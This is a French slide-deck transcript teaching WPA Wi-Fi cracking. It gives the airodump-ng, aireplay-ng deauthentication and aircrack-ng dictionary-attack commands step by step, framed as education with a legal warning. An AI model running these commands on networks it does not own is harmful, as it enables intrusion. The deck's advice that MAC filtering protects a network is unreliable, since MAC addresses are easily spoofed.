Intrusion Reseau Sans-fil WPA

19
INTRUSION DANS UN RÉSEAU (SANS-FIL) Casser la protection WPA par BruteForce 2022-06-14 Jean-François Brouillette 1

Transcript of Intrusion Reseau Sans-fil WPA

Page 1: Intrusion Reseau Sans-fil WPA

2023-04-12

INTRUSION DANS UN RÉSEAU(SANS-FIL)

Casser la protection WPA par BruteForce

Jean-François Brouillette 1

Page 2: Intrusion Reseau Sans-fil WPA

2023-04-12

Attention

Il est important de noter que ce diaporama est conçu à des fins éducatives seulement.

Toutes utilisations inappropriées des présentes techniques n’engagent que vous.

Amusez-vous quand même !

Jean-François Brouillette 2

Page 3: Intrusion Reseau Sans-fil WPA

2023-04-12

Interface Sans-Fil Il est primordial de connaître l’interface qui gère

notre sans-fil

La commande :

Jean-François Brouillette 3

Page 4: Intrusion Reseau Sans-fil WPA

2023-04-12

Interface Sans-Fil (suite) Nous devrions voir l’interface wlan0

Jean-François Brouillette 4

Page 5: Intrusion Reseau Sans-fil WPA

2023-04-12

Wicd Network Manager

Nous devons obtenir l’adresse MAC du point d’accès cible et son Channel

Pour s’y faire nous utiliserons un logiciel déjà fourni avec BackTrack4 R2 (Wicd)

Il se trouve dans l’onglet Internet du menu BackTrack

Jean-François Brouillette 5

Page 6: Intrusion Reseau Sans-fil WPA

2023-04-12

Wicd (suite) Voici ce que vous devriez voir

Jean-François Brouillette 6

J’ai un peu triché… Vous ne devriez que voir la fenêtre qui est en arrière-plan. (pour l’instant)

Pour faire afficher les deux autres, cliquez sur « Properties » et « Information » respectivement. Et voila nous avons la MAC et le channel de notre point d’accès cible!

Page 7: Intrusion Reseau Sans-fil WPA

2023-04-12

Démarrer le moniteur

Avant tout il faudra démarrer le mode moniteur sur notre interface sans-fil.

La commande:

Jean-François Brouillette 7

wlan0 - Spécifie sur quel interface on démarre le mode moniteur1 - Défini sur quel Channel le moniteur écoutera

Page 8: Intrusion Reseau Sans-fil WPA

2023-04-12

Démarrer le moniteur (suite) Vous devriez voir ceci:

Jean-François Brouillette 8

On voit très bien que le mode moniteur a bien démarré et que son interface est mon0

Page 9: Intrusion Reseau Sans-fil WPA

2023-04-12

Vers les commandes …

Si on résume jusqu’à maintenant nous avons ces informations:MAC du point d’accès [00:1E:58:XX:XX:XX]Interface Sans-Fil [wlan0]Channel [1]

Jean-François Brouillette 9

Passons aux commandes maintenant!

Page 10: Intrusion Reseau Sans-fil WPA

2023-04-12

Analyser le PA (Point d’accès) Nous devons tout d’abord analyser le trafic

du PA. Nous aurons également besoin de voir si des clients s’y connectent.

La commande:

Jean-François Brouillette 10

airodump-ng --bssid 00:1E:58:XX:XX:XX -c 1 -w psk mon0

--bssid : C’est l’adresse MAC du PA-c : C’est le Channel utilisé par le PA-w : Le nom des fichiers qui seront créésmon0 : C’est l’interface qui monitorise le sans-fil

Page 11: Intrusion Reseau Sans-fil WPA

2023-04-12

Analyser le PA (suite) Vous devriez obtenir ceci:

Jean-François Brouillette 11

La section du haut nous donne les informations sur le PA tandis que celle du bas nous liste les clients connectés à celui-ci

Page 12: Intrusion Reseau Sans-fil WPA

2023-04-12

Donne-moi la main …

Jean-François Brouillette 12

Ici il devrait normalement y avoir une confirmation de « poignée de main » avec le PA… Mais comme rien n’est aussi simple nous devrons tenter de dé-authentifier tout les clients pour forcer le trafic

Page 13: Intrusion Reseau Sans-fil WPA

2023-04-12

Donne-moi la main (suite) Il existe une simple commande pour

tenter d’obtenir la « poignée de main »

Jean-François Brouillette 13

aireplay-ng -c A8:6A:6F:XX:XX:XX -a 00:1E:58:XX:XX:XX -0 1 mon0

-c : C’est l’adresse MAC d’un client (pris au hasard)-a : C’est l’adresse MAC du PA-0 : C’est le type d’attaque (dé-auth)mon0 : C’est l’interface qui monitorise

Page 14: Intrusion Reseau Sans-fil WPA

2023-04-12

Donne-moi la main (suite) On devrait voir ceci:

Et obtenir la confirmation (« Poignée de main »)

Jean-François Brouillette 14

Page 15: Intrusion Reseau Sans-fil WPA

2023-04-12

À l’attaque!

Maintenant, voici ce que nous avons:○ MAC du PA [00:1E:58:XX:XX:XX]○ Channel [1]○ Interface Monitoré [mon0]○ La « Poignée de main »

Jean-François Brouillette 15

Tout ceci est amplement suffisant car pendant que vous effectuiez vos analyse le programme airodump enregistrait toutes ces informations (requises pour l’attaque) dans des fichiers sur le bureau. (psk dans notre cas)

Passons sans plus attendre à la prochaine étape!

Page 16: Intrusion Reseau Sans-fil WPA

2023-04-12

À l’attaque (suite)

Voici la commande magique:

Jean-François Brouillette 16

aircrack-ng -b 00:1E:58:XX:XX:XX -w passwords psk*.cap

-b : C’est l’adresse MAC du PA

-w : C’est le nom du dictionnaire de mots à utiliser

psk*.cap : C’est le nom des fichiers créés par airodump contenant les analyses. L’étoile est pour indiquer de prendre tout ceux générés

Page 17: Intrusion Reseau Sans-fil WPA

2023-04-12

Résultat … ?

Jean-François Brouillette 17

Et oui! La clé a été trouvé.

Le mot de passe a évidemment été inséré dans le fichier passwords volontairement pour éviter les longs délais sur un fichier de 500Go par exemple.

Page 18: Intrusion Reseau Sans-fil WPA

2023-04-12

Conclusion

Maintenant vous savez comment un inconnu peut se connecter sur votre connexion sans-fil. Et ce, même si elle est protégé par WPA.

Une façon de s’en protéger est d’accepter uniquement les requêtes des adresses MAC connues. (Filtre MAC)

Jean-François Brouillette 18

Page 19: Intrusion Reseau Sans-fil WPA

2023-04-12

Conclusion (suite) Je tiens a rappeler qu’effectuer ces manipulations sur

un réseau qui n’est pas le votre est considéré comme un délit criminel.

Plus vous effectuerez de tests sur votre réseau plus vous serez en mesure de découvrir comment vous protéger

Jean-François Brouillette 19

Merci de votre lecture!

Pour toute questions / commentaires :

[email protected]